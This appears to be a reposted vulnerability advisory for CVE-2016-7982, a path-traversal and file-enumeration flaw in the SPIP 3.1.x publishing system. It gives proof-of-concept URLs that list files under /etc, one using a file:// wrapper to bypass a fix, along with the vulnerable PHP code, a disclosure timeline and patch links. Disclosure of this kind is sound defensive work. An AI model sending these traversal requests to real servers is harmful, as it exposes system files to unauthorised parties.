SPIP 3.1.2 File Enumeration / Path Traversal

2016.10.20
Risk: Low
Local: No
Remote: Yes


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

## SPIP 3.1.1/3.1.2 File Enumeration / Path Traversal (CVE-2016-7982) ### Product Description SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence. ### Vulnerability Description The `valider_xml` file can be used to enumerate files on the system. **Access Vector**: remote **Security Risk**: medium **Vulnerability**: CWE-538 **CVSS Base Score**: 4.9 (Medium) **CVE-ID**: CVE-2016-7982 ### Proof of Concept Enumerating `.ini` files inside `/etc` (SPIP 3.1.1) : http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=/etc&ext=ini&recur=2 Bypassing SPIP 3.1.2 protection using PHP Wrappers : http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=file:///etc&ext=ini&recur=2 ### Vulnerable code if (is_dir($url)) { $dir = (substr($url, -1, 1) === '/') ? $url : "$url/"; $ext = !preg_match('/^[.*\w]+$/', $req_ext) ? 'php' : $req_ext; $files = preg_files($dir, "$ext$", $limit, $rec); if (!$files and $ext !== 'html') { $files = preg_files($dir, 'html$', $limit, $rec); if ($files) { $ext = 'html'; } } if ($files) { $res = valider_dir($files, $ext, $url); list($err, $res) = valider_resultats($res, $ext === 'html'); File names are stored in `$res` and displayed by `echo` on line 146 : echo "<h1>", $titre, '<br>', $bandeau, '</h1>', "<div style='text-align: center'>", $onfocus, "</div>", $res, fin_page(); ### Timeline (dd/mm/yyyy) * 15/09/2016 : Initial discovery * 26/09/2016 : Contact with SPIP Team * 27/09/2016 : Answer from SPIP Team, sent advisory details * 27/09/2016 : Incorrect fixes for Path Traversal * 27/09/2016 : New proof of concept for bypassing Path Traversal sent. * 27/09/2016 : Bad fix for Path Traversal (23185) * 28/09/2016 : New proof of concept for bypassing fixes for Path Traversal on Windows systems. * 28/09/2016 : Fixes issued Path Traversal (23200) * 30/09/2016 : SPIP 3.1.3 Released ### Fixes * https://core.spip.net/projects/spip/repository/revisions/23207 * https://core.spip.net/projects/spip/repository/revisions/23208 * https://core.spip.net/projects/spip/repository/revisions/23206 * https://core.spip.net/projects/spip/repository/revisions/23202 * https://core.spip.net/projects/spip/repository/revisions/23201 * https://core.spip.net/projects/spip/repository/revisions/23200 * https://core.spip.net/projects/spip/repository/revisions/23191 * https://core.spip.net/projects/spip/repository/revisions/23190 * https://core.spip.net/projects/spip/repository/revisions/23193 * https://core.spip.net/projects/spip/repository/revisions/23188 * https://core.spip.net/projects/spip/repository/revisions/23187 * https://core.spip.net/projects/spip/repository/revisions/23185 * https://core.spip.net/projects/spip/repository/revisions/23182 * https://core.spip.net/projects/spip/repository/revisions/23184 ### Affected versions * Version <= 3.1.2 ### Credits * Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com) -- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top